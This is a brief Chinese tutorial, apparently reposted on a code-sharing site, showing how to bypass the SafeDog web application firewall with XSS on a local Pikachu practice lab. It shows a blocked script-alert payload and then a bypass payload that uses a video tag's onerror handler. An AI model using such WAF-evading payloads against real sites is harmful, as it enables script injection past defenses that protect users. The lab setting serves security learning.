45-2 waf绕过 - XSS 绕过WAF方法

52 阅读 0 评论 0 点赞

环境准备：

43-5 waf绕过 - 安全狗简介及安装-CSDN博客
然后安装pikachu靶场：构建完善的安全渗透测试环境：推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客

打开pikachu靶场

http://127.0.0.1/pikachu-master/vul/xss/xss_reflected_get.php

使用常见payload被安全狗拦截

<script>alert("@@")</script>

绕过

1）HTME5新标签<video>绕过：

绕过payload：

<video src=1 onerror=alert(/渣渣辉/)>

本站资源均来自互联网，仅供研究学习，禁止违法使用和商用，产生法律纠纷本站概不负责！如果侵犯了您的权益请与我们联系！

转载请注明出处：免费源码网-免费的源码资源网站 » 45-2 waf绕过 - XSS 绕过WAF方法

点赞(0) 打赏

本文分类：文章资讯
本文标签：45-2 waf绕过 - XSS 绕过WAF方法
浏览次数：52 次浏览
本文链接：https://freeymw.com/article/10610.html

上一篇 > spring入门aop和ioc
下一篇 > LabVIEW 与组态软件在自动化系统中的应用比较与选择

评论列表共有 0 条评论

暂无评论

发表评论取消回复

微信公众账号

微信扫一扫加关注

发表
评论返回
顶部